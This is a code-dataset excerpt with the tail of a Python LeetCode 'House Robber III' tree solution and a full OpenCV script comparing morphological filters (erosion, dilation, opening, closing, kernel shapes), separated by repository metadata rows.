right_sun_sum = self.rob(right.left) + self.rob(right.right)
self.visited[root] = max(root.val + right_sun_sum + left_sun_sum, self.rob(root.left) + self.rob(root.right))
return self.visited[root]
# 上述方法弊端是每一步要递归访问6个点,左右,左右的左右
# 优化方法是每步值访问左右两个结点,并记录两种状态
class Solution3(object):
def rob(self, root):
def helper(root):
if root is None:
return [0, 0]
left = helper(root.left)
right = helper(root.right)
result1 = root.val + left[1] + right[1]
result2 = max(left) + max(right)
return [result1, result2]
return max(helper(root))
| lmb633/leetcode | 337rob.py | 337rob.py | py | 2,012 | python | en | code | 0 | github-code | 13 |
5186419565 | import cv2
import numpy as np
img = cv2.imread('im.jpg',0)
kernel = np.ones((5,5),np.uint8)
# Erosion
erosion = cv2.erode(img,kernel,iterations = 1)
compare_ero = np.hstack((img,erosion))
cv2.imshow('Erosion',compare_ero)
cv2.imwrite('Erosion.jpg',erosion)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Dilation
dilation = cv2.dilate(img,kernel,iterations = 1)
compare_dil = np.hstack((img,dilation))
cv2.imshow('Dilation',compare_dil)
cv2.imwrite('Dilation.jpg',dilation)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Opening
opening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)
compare_open = np.hstack((img,opening))
cv2.imshow('Opening',compare_open)
cv2.imwrite('Opening.jpg',opening)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Closing
closing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)
compare_close = np.hstack((img,closing))
cv2.imshow('Closing',compare_close)
cv2.imwrite('Closing.jpg',closing)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Erosion vs Dilation vs Opening
compare_ero_dil_open = np.hstack((erosion,dilation,opening))
cv2.imshow('Erosion vs Dilation vs Opening',compare_ero_dil_open)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Dilation vs Erosion vs Closing
compare_dil_ero_close = np.hstack((dilation,erosion,closing))
cv2.imshow('Dilation vs Erosion vs Closing',compare_dil_ero_close)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Opening vs Closing
compare_open_close = np.hstack((opening,closing))
cv2.imshow('Opening vs Closing',compare_open_close)
cv2.waitKey(0)
cv2.destroyAllWindows()
## Structuring Element
# Rectangular Kernel
rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(5,5))
# Elliptical Kernel
ellip_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
# Cross-shaped Kernel
cross_kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(5,5))
# compare each kernel with closing
rect_op = cv2.morphologyEx(img, cv2.MORPH_CLOSE, rect_kernel)
ellip_op = cv2.morphologyEx(img, cv2.MORPH_CLOSE, ellip_kernel)
cross_op = cv2.morphologyEx(img, cv2.MORPH_CLOSE, cross_kernel)
compare_rect_ellip_cross = np.hstack((rect_op,ellip_op,cross_op))
cv2.imshow('Rectangular vs Elliptical vs Cross-shaped Kernel with Closing Morpholoical Filter',compare_rect_ellip_cross)
cv2.waitKey(0)
cv2.destroyAllWindows()
| PimKanjana/Morphological-Filters | morpho.py | morpho.py | py | 2,321 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.